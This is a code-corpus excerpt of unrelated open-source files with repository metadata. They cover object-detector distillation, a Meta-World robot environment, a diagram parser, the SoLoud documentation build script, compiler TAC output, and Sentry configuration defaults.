for i in self.train_cfg.teacher.backbone_at_idxes:
feats += (backbone_feats[i],)
if self.with_neck:
neck_feats = self.neck(backbone_feats)
if self.train_cfg.teacher.neck_at:
feats += neck_feats
outs = self.bbox_head(neck_feats)
else:
outs = self.bbox_head(backbone_feats)
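        # run the teacher network on the same batch under no_grad; its features and head outputs only serve as distillation targets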
with torch.no_grad():
t_feats = ()
t_backbone_feats = self.teacher_detector.backbone(img)
if self.train_cfg.teacher.backbone_at:
for i in self.train_cfg.teacher.backbone_at_idxes:
t_feats += (t_backbone_feats[i],)
if self.with_neck:
t_neck_feats = self.teacher_detector.neck(t_backbone_feats)
if self.train_cfg.teacher.neck_at:
t_feats += t_neck_feats
t_outs = self.teacher_detector.bbox_head(t_neck_feats)
else:
t_outs = self.teacher_detector.bbox_head(t_backbone_feats)
loss_inputs = (feats,) + outs + (t_feats,) + t_outs + (gt_bboxes, gt_labels, img_metas, self.train_cfg)
losses = self.bbox_head.loss(
*loss_inputs, gt_bboxes_ignore=gt_bboxes_ignore)
return losses
| 42.059701 | 112 | 0.551455 | 2,560 | 0.908446 | 0 | 0 | 2,587 | 0.918027 | 0 | 0 | 23 | 0.008162 |
b9f8cb65181ebad752b9a810d28cc601137f1877 | 4,518 | py | Python | metaworld/envs/mujoco/sawyer_xyz/v2/sawyer_dial_turn_v2.py | yiwc/robotics-world | 48efda3a8ea6741b35828b02860f45753252e376 | [
"MIT"
] | 681 | 2019-09-09T19:34:37.000Z | 2022-03-31T12:17:58.000Z | metaworld/envs/mujoco/sawyer_xyz/v2/sawyer_dial_turn_v2.py | yiwc/robotics-world | 48efda3a8ea6741b35828b02860f45753252e376 | [
"MIT"
] | 212 | 2019-09-18T14:43:44.000Z | 2022-03-27T22:21:00.000Z | metaworld/envs/mujoco/sawyer_xyz/v2/sawyer_dial_turn_v2.py | yiwc/robotics-world | 48efda3a8ea6741b35828b02860f45753252e376 | [
"MIT"
] | 157 | 2019-09-12T05:06:05.000Z | 2022-03-29T14:47:24.000Z | import numpy as np
from gym.spaces import Box
from metaworld.envs import reward_utils
from metaworld.envs.asset_path_utils import full_v2_path_for
from metaworld.envs.mujoco.sawyer_xyz.sawyer_xyz_env import SawyerXYZEnv, _assert_task_is_set
class SawyerDialTurnEnvV2(SawyerXYZEnv):
TARGET_RADIUS = 0.07
def __init__(self):
hand_low = (-0.5, 0.40, 0.05)
hand_high = (0.5, 1, 0.5)
obj_low = (-0.1, 0.7, 0.0)
obj_high = (0.1, 0.8, 0.0)
goal_low = (-0.1, 0.73, 0.0299)
goal_high = (0.1, 0.83, 0.0301)
super().__init__(
self.model_name,
hand_low=hand_low,
hand_high=hand_high,
)
self.init_config = {
'obj_init_pos': np.array([0, 0.7, 0.0]),
'hand_init_pos': np.array([0, 0.6, 0.2], dtype=np.float32),
}
self.goal = np.array([0., 0.73, 0.08])
self.obj_init_pos = self.init_config['obj_init_pos']
self.hand_init_pos = self.init_config['hand_init_pos']
self._random_reset_space = Box(
np.array(obj_low),
np.array(obj_high),
)
self.goal_space = Box(np.array(goal_low), np.array(goal_high))
@property
def model_name(self):
return full_v2_path_for('sawyer_xyz/sawyer_dial.xml')
@_assert_task_is_set
def evaluate_state(self, obs, action):
(reward,
tcp_to_obj,
_,
target_to_obj,
object_grasped,
in_place) = self.compute_reward(action, obs)
info = {
'success': float(target_to_obj <= self.TARGET_RADIUS),
'near_object': float(tcp_to_obj <= 0.01),
'grasp_success': 1.,
'grasp_reward': object_grasped,
'in_place_reward': in_place,
'obj_to_target': target_to_obj,
'unscaled_reward': reward,
}
return reward, info
def _get_pos_objects(self):
dial_center = self.get_body_com('dial').copy()
dial_angle_rad = self.data.get_joint_qpos('knob_Joint_1')
offset = np.array([
np.sin(dial_angle_rad),
-np.cos(dial_angle_rad),
0
])
dial_radius = 0.05
offset *= dial_radius
return dial_center + offset
def _get_quat_objects(self):
return self.sim.data.get_body_xquat('dial')
def reset_model(self):
self._reset_hand()
self._target_pos = self.goal.copy()
self.obj_init_pos = self.init_config['obj_init_pos']
self.prev_obs = self._get_curr_obs_combined_no_goal()
if self.random_init:
goal_pos = self._get_state_rand_vec()
self.obj_init_pos = goal_pos[:3]
final_pos = goal_pos.copy() + np.array([0, 0.03, 0.03])
self._target_pos = final_pos
self.sim.model.body_pos[self.model.body_name2id('dial')] = self.obj_init_pos
self.dial_push_position = self._get_pos_objects() + np.array([0.05, 0.02, 0.09])
return self._get_obs()
def compute_reward(self, action, obs):
obj = self._get_pos_objects()
dial_push_position = self._get_pos_objects() + np.array([0.05, 0.02, 0.09])
tcp = self.tcp_center
target = self._target_pos.copy()
target_to_obj = (obj - target)
target_to_obj = np.linalg.norm(target_to_obj)
target_to_obj_init = (self.dial_push_position - target)
target_to_obj_init = np.linalg.norm(target_to_obj_init)
in_place = reward_utils.tolerance(
target_to_obj,
bounds=(0, self.TARGET_RADIUS),
margin=abs(target_to_obj_init - self.TARGET_RADIUS),
sigmoid='long_tail',
)
dial_reach_radius = 0.005
tcp_to_obj = np.linalg.norm(dial_push_position - tcp)
tcp_to_obj_init = np.linalg.norm(self.dial_push_position - self.init_tcp)
reach = reward_utils.tolerance(
tcp_to_obj,
bounds=(0, dial_reach_radius),
margin=abs(tcp_to_obj_init-dial_reach_radius),
sigmoid='gaussian',
)
gripper_closed = min(max(0, action[-1]), 1)
reach = reward_utils.hamacher_product(reach, gripper_closed)
tcp_opened = 0
object_grasped = reach
reward = 10 * reward_utils.hamacher_product(reach, in_place)
return (reward,
tcp_to_obj,
tcp_opened,
target_to_obj,
object_grasped,
in_place)
| 31.816901 | 93 | 0.599823 | 4,273 | 0.945772 | 0 | 0 | 692 | 0.153165 | 0 | 0 | 253 | 0.055998 |
b9fa33196acc6d33e769b7c8e96ca3b00aeee8cc | 237 | wsgi | Python | obviforum/obviforum.wsgi | dcloutman/obviforum | 31af0cf6f2e243bff9d920276831415bd5210cf9 | [
"MIT"
] | null | null | null | obviforum/obviforum.wsgi | dcloutman/obviforum | 31af0cf6f2e243bff9d920276831415bd5210cf9 | [
"MIT"
] | null | null | null | obviforum/obviforum.wsgi | dcloutman/obviforum | 31af0cf6f2e243bff9d920276831415bd5210cf9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
import logging
import os
logging.basicConfig(stream=sys.stderr)
file_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, file_dir)
from main import app as application
from main import db
| 23.7 | 54 | 0.797468 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 21 | 0.088608 |
b9fa7c6bd7a253ee2a588381042c5dfd3d99cb96 | 2,560 | py | Python | yezdi/parser/parser.py | ragsagar/yezdi | 5b97bedc56d5af7f28b244a0d7c0c8259f643102 | [
"MIT"
] | 1 | 2021-04-27T20:07:42.000Z | 2021-04-27T20:07:42.000Z | yezdi/parser/parser.py | ragsagar/yezdi | 5b97bedc56d5af7f28b244a0d7c0c8259f643102 | [
"MIT"
] | null | null | null | yezdi/parser/parser.py | ragsagar/yezdi | 5b97bedc56d5af7f28b244a0d7c0c8259f643102 | [
"MIT"
] | null | null | null | from yezdi.lexer.token import TokenType
from yezdi.parser.ast import Program, Statement, Participant, Title, LineStatement
class Parser:
def __init__(self, lexer):
self.lexer = lexer
self.current_token = None
self.peek_token = None
self.next_token()
self.next_token()
self.participants = {}
def next_token(self):
self.current_token, self.peek_token = self.peek_token, self.lexer.next_token()
def parse_program(self):
program = Program()
while self.current_token.type != TokenType.EOF:
statement = self.parse_statement()
if statement:
program.statements.append(statement)
self.next_token()
return program
def parse_statement(self):
if self.current_token.type == TokenType.IDENTIFIER:
return self.parse_line_statement()
elif self.current_token.type == TokenType.TITLE:
return self.parse_title()
return None
def parse_line_statement(self):
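        # expected token shape: IDENTIFIER (SOLID_LINE | DASHED_LINE) IDENTIFIER COLON [IDENTIFIER]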
participant_literal = self.current_token.literal
        if self.peek_token.type not in [TokenType.SOLID_LINE, TokenType.DASHED_LINE]:
return None
self.next_token()
participant = Participant(participant_literal)
line = LineStatement(self.current_token.type)
line.set_source(participant)
if not self.expect_peek(TokenType.IDENTIFIER):
return None
target = Participant(self.current_token.literal)
line.set_target(target)
if not self.expect_peek(TokenType.COLON):
return None
if self.expect_peek(TokenType.IDENTIFIER):
line.set_info(self.current_token.literal)
if self.peek_token.type not in [TokenType.NEWLINE, TokenType.EOF]:
return None
statement = Statement(line)
return statement
def get_participant(self, value):
if value in self.participants:
return self.participants[value]
else:
participant = Participant(value)
self.participants[value] = participant
return participant
def expect_peek(self, token_type):
if self.peek_token.type == token_type:
self.next_token()
return True
else:
return False
def parse_title(self):
if not self.expect_peek(TokenType.IDENTIFIER):
return None
title = Title(self.current_token.literal)
return Statement(title)
class ParserError(Exception):
pass
| 32 | 86 | 0.640625 | 2,431 | 0.949609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
b9fae34b418d8854a4b364f1044c114896456110 | 1,050 | py | Python | scripts/check_categories.py | oberron/entolusis | 209e1e245d8e501e5e6ea2f52dd5b0da7d886f5c | [
"MIT"
] | null | null | null | scripts/check_categories.py | oberron/entolusis | 209e1e245d8e501e5e6ea2f52dd5b0da7d886f5c | [
"MIT"
] | null | null | null | scripts/check_categories.py | oberron/entolusis | 209e1e245d8e501e5e6ea2f52dd5b0da7d886f5c | [
"MIT"
] | null | null | null | # list categories in category folder
from os import walk
from os.path import abspath,join, pardir
categories_folder = abspath(join(__file__,pardir,pardir,"category"))
post_folder = abspath(join(__file__,pardir,pardir,"_posts"))
site_categories = []
for root,directories,files in walk(categories_folder):
for f in files:
site_categories.append(f.split(".md")[0])
site_categories = set(site_categories)
for root,directories,files in walk(post_folder):
for f in files:
with open(join(root,f),'r',encoding="utf-8") as fi:
lines = fi.readlines()
for l in lines:
if l.find("categories")==0:
categories = l.split(":")[1]
                    for c in [" ","[","]","\n"]:
                        categories = categories.replace(c,"")
                    # split into a list only after stripping stray characters, otherwise
                    # .replace() would be called on a list in the next loop pass
                    categories = categories.split(",")
                    if len(set(categories)-site_categories)>0:
                        print(f,set(categories)-site_categories)
                    break
print("done") | 36.206897 | 68 | 0.578095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 108 | 0.102857 |
b9fb43e9d0e20574f25b444b461b284752a17b4c | 5,311 | py | Python | docsrc/makedoc.py | syoyo/soloud | cce88a2408a4b1e88ccbc75de9897b39bc3e7dda | [
"Libpng",
"Zlib"
] | 1 | 2019-11-25T11:32:09.000Z | 2019-11-25T11:32:09.000Z | docsrc/makedoc.py | syoyo/soloud | cce88a2408a4b1e88ccbc75de9897b39bc3e7dda | [
"Libpng",
"Zlib"
] | null | null | null | docsrc/makedoc.py | syoyo/soloud | cce88a2408a4b1e88ccbc75de9897b39bc3e7dda | [
"Libpng",
"Zlib"
] | null | null | null | #!/usr/bin/env python3
""" builds documentation files from multimarkdown (mmd) source
to various formats, including the web site and pdf.
"""
import subprocess
import glob
import os
import sys
import time
import shutil
src = [
"intro.mmd",
"downloads.mmd",
"quickstart.mmd",
"faq.mmd",
"dirstruct.mmd",
"premake.mmd",
"legal.mmd",
"concepts.mmd",
"concepts3d.mmd",
"voicemanagement.mmd",
"examples.mmd",
"foreign_interface.mmd",
"c_api.mmd",
"python_api.mmd",
"ruby_api.mmd",
"rpgmaker_api.mmd",
"bmx_api.mmd",
"gamemaker_api.mmd",
"cs_api.mmd",
"d_api.mmd",
"codegen.mmd",
"basics.mmd",
"attributes.mmd",
"faders.mmd",
"voicegroups.mmd",
"coremisc.mmd",
"core3d.mmd",
"audiosource.mmd",
"newsoundsources.mmd",
"wav.mmd",
"wavstream.mmd",
"speech.mmd",
"sfxr.mmd",
"modplug.mmd",
"monotone.mmd",
"tedsid.mmd",
"vizsn.mmd",
"vic.mmd",
"filters.mmd",
"biquadfilter.mmd",
"echofilter.mmd",
"lofifilter.mmd",
"flangerfilter.mmd",
"dcremovalfilter.mmd",
"fftfilter.mmd",
"bassboostfilter.mmd",
"waveshaperfilter.mmd",
"mixbus.mmd",
"queue.mmd",
"collider.mmd",
"attenuator.mmd",
"file.mmd",
"backends.mmd"
]
website_only = [
"downloads.mmd"
]
unknown = 0
for file in glob.glob("*.mmd"):
if file not in src:
unknown = 1
print(file + " not included in docs!")
if unknown:
print("Add the new files to makedoc.py, soloud.tex and htmlpre.txt.")
sys.exit()
datestring = time.strftime("%Y%m%d")
if not os.path.exists(datestring + "/web"):
os.makedirs(datestring + "/web")
if not os.path.exists("temp/"):
os.makedirs("temp/")
print("- -- --- -- - Generating single-file HTML docs")
callp = ["pandoc", "-s", "-t", "html5", "-f", "markdown-smart", "--metadata", 'title="SoLoud ' + datestring + '"', "-H", "singlehtml_head.txt", "-B", "singlehtml_body.txt", "--toc", "--self-contained", "--default-image-extension=png", "-o", datestring + "/soloud_" + datestring + ".html"]
for x in src:
if x not in website_only:
callp.append(x)
subprocess.call(callp)
print("- -- --- -- - Generating web site")
for x in src:
subprocess.call(["pandoc", "--template=html.pandoc", "-f", "markdown-smart", "--metadata", 'title="SoLoud ' + datestring + ' ' + x[:len(x)-4] + '"', "-B", "htmlpre.txt", "-A", "htmlpost.txt", "--default-image-extension=png", x, "-o", datestring + "/web/" + x[:len(x)-3]+"html.bak"])
with open(datestring + "/web/" + x[:len(x)-3]+"html", "w") as file_out:
with open(datestring + "/web/" + x[:len(x)-3]+"html.bak", "r") as file_in:
for line in file_in:
file_out.write(line.replace('code>', 'code>\n').replace('::','::<wbr>').replace('\xc2','').replace('\xa0',''))
if x == "intro.mmd":
if os.path.isfile(datestring + "/web/index.html"):
os.remove(datestring + "/web/index.html")
os.rename(datestring + "/web/intro.html", datestring + "/web/index.html")
print("- -- --- -- - Generating epub")
callp = ["pandoc", "-N", "--toc", "--epub-cover-image=images/cover.png", "-t", "epub3", "--default-image-extension=png", "-f", "markdown-smart", "--css=epub.css", "--epub-metadata=metadata.xml", "-o", datestring + "/soloud_" + datestring + ".epub", "title.txt"]
for x in src:
if x not in website_only:
callp.append(x)
subprocess.call(callp)
print("- -- --- -- - Converting epub -> mobi (kindlegen_output.txt)")
with open('kindlegen_output.txt', 'w') as outfile:
subprocess.call(["kindlegen", datestring + "/soloud_" + datestring + ".epub", "-c2"], stdout=outfile)
print("- -- --- -- - Generating LaTex")
for x in src:
if x not in website_only:
subprocess.call(["pandoc", "-t", "latex", "--listings", "--default-image-extension=pdf", "--top-level-division=chapter", x, "-o", "temp/" + x[:len(x)-3]+"tex.orig"])
with open("temp/" + x[:len(x)-3]+"tex", "w") as file_out:
with open("temp/" + x[:len(x)-3]+"tex.orig", "r") as file_in:
for line in file_in:
file_out.write(line.replace('\\begin{longtable}[]{@{}ll@{}}', '\\begin{tabulary}{\\textwidth}{lJ}').replace('\\begin{longtable}[]{@{}lll@{}}', '\\begin{tabulary}{\\textwidth}{lJJ}').replace('\\begin{longtable}[]{@{}llll@{}}', '\\begin{tabulary}{\\textwidth}{lJJJ}').replace('\\endhead','').replace('\\end{longtable}','\\end{tabulary}'))
print("- -- --- -- - Generating pdf (xelatex_output.txt)")
with open('xelatex_output.txt', 'w') as outfile:
subprocess.call(["xelatex", "SoLoud.tex"], stdout=outfile)
print("- -- --- -- - Generating pdf pass 2..")
subprocess.call(["xelatex", "SoLoud.tex"], stdout=outfile)
shutil.move("SoLoud.pdf", datestring + "/soloud_" + datestring + ".pdf")
print("- -- --- -- - Cleanup..")
tempsuffix = ["aux", "toc", "out", "log", "lg", "4ct", "4tc", "idv", "tmp", "xdv", "xref", "bak"]
for suffix in tempsuffix:
for file in glob.glob("*."+suffix):
os.remove(file)
for file in glob.glob(datestring + "/web/*."+suffix):
os.remove(file)
for file in glob.glob("temp/*"):
os.remove(file)
os.rmdir("temp")
print("- -- --- -- - Done - " + datestring)
| 34.940789 | 356 | 0.583129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,775 | 0.5225 |
b9fc3dd10a80beed547f86b535cfadc6f817e0e2 | 4,872 | tac | Python | 6 复试/2 笔试/4 编译原理/hw/2016_黄家晖_PA/550405220_4_decaf_PA3/TestCases/S3/output/t9.tac | ladike/912_project | 5178c1c93ac6ca30ffc72dd689f5c6932704b4ab | [
"MIT"
] | 1 | 2022-03-02T16:05:49.000Z | 2022-03-02T16:05:49.000Z | 6 复试/2 笔试/4 编译原理/hw/2016_黄家晖_PA/550405220_4_decaf_PA3/TestCases/S3/output/t9.tac | ladike/912_project | 5178c1c93ac6ca30ffc72dd689f5c6932704b4ab | [
"MIT"
] | null | null | null | 6 复试/2 笔试/4 编译原理/hw/2016_黄家晖_PA/550405220_4_decaf_PA3/TestCases/S3/output/t9.tac | ladike/912_project | 5178c1c93ac6ca30ffc72dd689f5c6932704b4ab | [
"MIT"
] | null | null | null | VTABLE(_Main) {
<empty>
Main
_Main.COPY;
}
VTABLE(_Base) {
<empty>
Base
_Base.COPY;
}
VTABLE(_Sub1) {
_Base
Sub1
_Sub1.COPY;
}
VTABLE(_Sub2) {
_Base
Sub2
_Sub2.COPY;
}
VTABLE(_Sub3) {
_Sub1
Sub3
_Sub3.COPY;
}
VTABLE(_Sub4) {
_Sub3
Sub4
_Sub4.COPY;
}
FUNCTION(_Main_New) {
memo ''
_Main_New:
_T1 = 4
parm _T1
_T2 = call _Alloc
_T3 = VTBL <_Main>
*(_T2 + 0) = _T3
return _T2
}
FUNCTION(_Main.COPY) {
memo '_T4:4'
_Main.COPY:
_T5 = 4
parm _T5
_T6 = call _Alloc
_T7 = VTBL <_Main>
*(_T6 + 0) = _T7
return _T6
}
FUNCTION(_Base_New) {
memo ''
_Base_New:
_T8 = 4
parm _T8
_T9 = call _Alloc
_T10 = VTBL <_Base>
*(_T9 + 0) = _T10
return _T9
}
FUNCTION(_Base.COPY) {
memo '_T11:4'
_Base.COPY:
_T12 = 4
parm _T12
_T13 = call _Alloc
_T14 = VTBL <_Base>
*(_T13 + 0) = _T14
return _T13
}
FUNCTION(_Sub1_New) {
memo ''
_Sub1_New:
_T15 = 4
parm _T15
_T16 = call _Alloc
_T17 = VTBL <_Sub1>
*(_T16 + 0) = _T17
return _T16
}
FUNCTION(_Sub1.COPY) {
memo '_T18:4'
_Sub1.COPY:
_T19 = 4
parm _T19
_T20 = call _Alloc
_T21 = VTBL <_Sub1>
*(_T20 + 0) = _T21
return _T20
}
FUNCTION(_Sub2_New) {
memo ''
_Sub2_New:
_T22 = 4
parm _T22
_T23 = call _Alloc
_T24 = VTBL <_Sub2>
*(_T23 + 0) = _T24
return _T23
}
FUNCTION(_Sub2.COPY) {
memo '_T25:4'
_Sub2.COPY:
_T26 = 4
parm _T26
_T27 = call _Alloc
_T28 = VTBL <_Sub2>
*(_T27 + 0) = _T28
return _T27
}
FUNCTION(_Sub3_New) {
memo ''
_Sub3_New:
_T29 = 4
parm _T29
_T30 = call _Alloc
_T31 = VTBL <_Sub3>
*(_T30 + 0) = _T31
return _T30
}
FUNCTION(_Sub3.COPY) {
memo '_T32:4'
_Sub3.COPY:
_T33 = 4
parm _T33
_T34 = call _Alloc
_T35 = VTBL <_Sub3>
*(_T34 + 0) = _T35
return _T34
}
FUNCTION(_Sub4_New) {
memo ''
_Sub4_New:
_T36 = 4
parm _T36
_T37 = call _Alloc
_T38 = VTBL <_Sub4>
*(_T37 + 0) = _T38
return _T37
}
FUNCTION(_Sub4.COPY) {
memo '_T39:4'
_Sub4.COPY:
_T40 = 4
parm _T40
_T41 = call _Alloc
_T42 = VTBL <_Sub4>
*(_T41 + 0) = _T42
return _T41
}
FUNCTION(main) {
memo ''
main:
_T48 = call _Base_New
_T43 = _T48
_T49 = call _Sub1_New
_T44 = _T49
_T50 = call _Sub2_New
_T45 = _T50
_T51 = call _Sub3_New
_T46 = _T51
_T52 = call _Sub4_New
_T47 = _T52
parm _T43
call _Main.printType
parm _T44
call _Main.printType
parm _T45
call _Main.printType
parm _T46
call _Main.printType
parm _T47
call _Main.printType
_T43 = _T47
parm _T43
call _Main.printType
_T54 = VTBL <_Sub1>
_T55 = *(_T43 + 0)
_L22:
_T53 = (_T54 == _T55)
if (_T53 != 0) branch _L23
_T55 = *(_T55 + 0)
if (_T55 != 0) branch _L22
_T56 = "Decaf runtime error: "
parm _T56
call _PrintString
_T57 = *(_T43 + 0)
_T58 = *(_T57 + 4)
parm _T58
call _PrintString
_T59 = " cannot be cast to "
parm _T59
call _PrintString
_T60 = VTBL <_Sub1>
_T61 = *(_T60 + 4)
parm _T61
call _PrintString
_T62 = "\n"
parm _T62
call _PrintString
call _Halt
_L23:
_T44 = _T43
parm _T44
call _Main.printType
}
FUNCTION(_Main.printType) {
memo '_T0:4'
_Main.printType:
_T64 = VTBL <_Sub4>
_T65 = *(_T0 + 0)
_L24:
_T63 = (_T64 == _T65)
if (_T63 != 0) branch _L25
_T65 = *(_T65 + 0)
if (_T65 != 0) branch _L24
_T63 = 0
_L25:
if (_T63 == 0) branch _L26
_T66 = "Sub4\n"
parm _T66
call _PrintString
branch _L27
_L26:
_T68 = VTBL <_Sub3>
_T69 = *(_T0 + 0)
_L28:
_T67 = (_T68 == _T69)
if (_T67 != 0) branch _L29
_T69 = *(_T69 + 0)
if (_T69 != 0) branch _L28
_T67 = 0
_L29:
if (_T67 == 0) branch _L30
_T70 = "Sub3\n"
parm _T70
call _PrintString
branch _L31
_L30:
_T72 = VTBL <_Sub2>
_T73 = *(_T0 + 0)
_L32:
_T71 = (_T72 == _T73)
if (_T71 != 0) branch _L33
_T73 = *(_T73 + 0)
if (_T73 != 0) branch _L32
_T71 = 0
_L33:
if (_T71 == 0) branch _L34
_T74 = "Sub2\n"
parm _T74
call _PrintString
branch _L35
_L34:
_T76 = VTBL <_Sub1>
_T77 = *(_T0 + 0)
_L36:
_T75 = (_T76 == _T77)
if (_T75 != 0) branch _L37
_T77 = *(_T77 + 0)
if (_T77 != 0) branch _L36
_T75 = 0
_L37:
if (_T75 == 0) branch _L38
_T78 = "Sub1\n"
parm _T78
call _PrintString
branch _L39
_L38:
_T80 = VTBL <_Base>
_T81 = *(_T0 + 0)
_L40:
_T79 = (_T80 == _T81)
if (_T79 != 0) branch _L41
_T81 = *(_T81 + 0)
if (_T81 != 0) branch _L40
_T79 = 0
_L41:
if (_T79 == 0) branch _L42
_T82 = "Base\n"
parm _T82
call _PrintString
_L42:
_L39:
_L35:
_L31:
_L27:
}
| 15.76699 | 34 | 0.555829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 156 | 0.03202 |
b9fc6312cdae3331d02a69bbbf58d767d486a41b | 1,361 | py | Python | arch/api/base/utils/party.py | yzjba/FATE | 9a6d252da637b2583a0f8a51f6cb4c615850bab9 | [
"Apache-2.0"
] | 32 | 2020-06-12T08:39:58.000Z | 2022-03-20T06:57:08.000Z | arch/api/base/utils/party.py | ErikSun2020/FATE | bdda535c7d8a974fc2c43102837964b7da199730 | [
"Apache-2.0"
] | 10 | 2020-11-13T18:55:48.000Z | 2022-02-10T02:00:12.000Z | arch/api/base/utils/party.py | ErikSun2020/FATE | bdda535c7d8a974fc2c43102837964b7da199730 | [
"Apache-2.0"
] | 16 | 2020-06-12T06:51:46.000Z | 2022-03-29T10:23:42.000Z | #
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Party(object):
"""
Uniquely identify
"""
def __init__(self, role, party_id):
self.role = role
self.party_id = party_id
def __hash__(self):
return (self.role, self.party_id).__hash__()
def __str__(self):
return f"Party(role={self.role}, party_id={self.party_id})"
def __repr__(self):
return self.__str__()
def __lt__(self, other):
return (self.role, self.party_id) < (other.role, other.party_id)
def __eq__(self, other):
return self.party_id == other.party_id and self.role == other.role
def to_pb(self):
from arch.api.proto import federation_pb2
return federation_pb2.Party(partyId=f"{self.party_id}", name=self.role)
| 30.244444 | 79 | 0.683321 | 742 | 0.545187 | 0 | 0 | 0 | 0 | 0 | 0 | 704 | 0.517267 |
b9fd9ad743eac1d46c7b5d951facfcfa09dbb1bf | 3,778 | py | Python | src/sentry/options/defaults.py | faulkner/sentry | f9dd4d0d7c683632cf02810c03bd42d7051ad010 | [
"BSD-3-Clause"
] | null | null | null | src/sentry/options/defaults.py | faulkner/sentry | f9dd4d0d7c683632cf02810c03bd42d7051ad010 | [
"BSD-3-Clause"
] | null | null | null | src/sentry/options/defaults.py | faulkner/sentry | f9dd4d0d7c683632cf02810c03bd42d7051ad010 | [
"BSD-3-Clause"
] | null | null | null | """
sentry.options.defaults
~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
from sentry.logging import LoggingFormat
from sentry.options import (
FLAG_IMMUTABLE, FLAG_NOSTORE, FLAG_PRIORITIZE_DISK, FLAG_REQUIRED, FLAG_ALLOW_EMPTY,
register,
)
from sentry.utils.types import Dict, String, Sequence
# Cache
# register('cache.backend', flags=FLAG_NOSTORE)
# register('cache.options', type=Dict, flags=FLAG_NOSTORE)
# System
register('system.admin-email', flags=FLAG_REQUIRED)
register('system.support-email', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('system.security-email', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('system.databases', type=Dict, flags=FLAG_NOSTORE)
# register('system.debug', default=False, flags=FLAG_NOSTORE)
register('system.rate-limit', default=0, flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('system.secret-key', flags=FLAG_NOSTORE)
# Absolute URL to the sentry root directory. Should not include a trailing slash.
register('system.url-prefix', ttl=60, grace=3600, flags=FLAG_REQUIRED | FLAG_PRIORITIZE_DISK)
register('system.root-api-key', flags=FLAG_PRIORITIZE_DISK)
register('system.logging-format', default=LoggingFormat.HUMAN, flags=FLAG_NOSTORE)
# Redis
register(
'redis.clusters',
type=Dict,
default={
'default': {
'hosts': {
0: {
'host': '127.0.0.1',
'port': 6379,
}
},
},
},
flags=FLAG_NOSTORE | FLAG_IMMUTABLE
)
register('redis.options', type=Dict, flags=FLAG_NOSTORE)
# symbolizer specifics
register('dsym.cache-path', type=String, default='/tmp/sentry-dsym-cache')
# Mail
register('mail.backend', default='smtp', flags=FLAG_NOSTORE)
register('mail.host', default='localhost', flags=FLAG_REQUIRED | FLAG_PRIORITIZE_DISK)
register('mail.port', default=25, flags=FLAG_REQUIRED | FLAG_PRIORITIZE_DISK)
register('mail.username', flags=FLAG_REQUIRED | FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('mail.password', flags=FLAG_REQUIRED | FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('mail.use-tls', default=False, flags=FLAG_REQUIRED | FLAG_PRIORITIZE_DISK)
register('mail.subject-prefix', default='[Sentry] ', flags=FLAG_PRIORITIZE_DISK)
register('mail.from', default='root@localhost', flags=FLAG_REQUIRED | FLAG_PRIORITIZE_DISK)
register('mail.list-namespace', type=String, default='localhost', flags=FLAG_NOSTORE)
register('mail.enable-replies', default=False, flags=FLAG_PRIORITIZE_DISK)
register('mail.reply-hostname', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('mail.mailgun-api-key', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
# SMS
register('sms.twilio-account', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('sms.twilio-token', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('sms.twilio-number', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
# U2F
register('u2f.app-id', default='', flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('u2f.facets', default=(), type=Sequence,
flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('auth.ip-rate-limit', default=0, flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('auth.user-rate-limit', default=0, flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
register('api.rate-limit.org-create', default=5, flags=FLAG_ALLOW_EMPTY | FLAG_PRIORITIZE_DISK)
# Filestore
register('filestore.backend', default='filesystem', flags=FLAG_NOSTORE)
register('filestore.options', default={'location': '/tmp/sentry-files'}, flags=FLAG_NOSTORE)
| 43.425287 | 95 | 0.75172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,283 | 0.339598 |
b9ff46cab163507c14f9b26bf086ce4979f54a2c | 4,972 | py | Python | tools/unidatadownload.py | henryiii/backrefs | ec82844098bc3bdc7bcaa61b32f80271e6a73da6 | [
"MIT"
] | null | null | null | tools/unidatadownload.py | henryiii/backrefs | ec82844098bc3bdc7bcaa61b32f80271e6a73da6 | [
"MIT"
] | null | null | null | tools/unidatadownload.py | henryiii/backrefs | ec82844098bc3bdc7bcaa61b32f80271e6a73da6 | [
"MIT"
] | null | null | null | """Download `Unicodedata` files."""
from __future__ import unicode_literals
import os
import zipfile
import codecs
from urllib.request import urlopen
__version__ = '2.2.0'
HOME = os.path.dirname(os.path.abspath(__file__))
def zip_unicode(output, version):
"""Zip the Unicode files."""
zipper = zipfile.ZipFile(os.path.join(output, 'unicodedata', '%s.zip' % version), 'w', zipfile.ZIP_DEFLATED)
target = os.path.join(output, 'unicodedata', version)
